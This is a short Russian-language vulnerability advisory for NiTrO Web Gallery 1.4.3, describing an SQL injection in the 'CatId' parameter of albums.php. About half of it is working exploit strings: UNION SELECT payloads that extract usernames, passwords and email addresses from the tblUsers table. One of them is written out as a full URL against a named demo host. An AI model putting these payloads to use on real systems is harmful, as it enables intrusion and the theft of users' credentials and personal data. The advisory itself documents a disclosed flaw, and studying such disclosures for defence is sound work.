Программа: NiTrO Web Gallery 1.4.3
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «CatId» сценарием albums.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws
(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8+from+tblUsers/*
albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws
(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers/*
Демонстрация:
http://demo.nitropowered.de/albums.php?section=cats&action=show&CatId=-1+
union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,
5,6,7,8,9+from+tblUsers/*
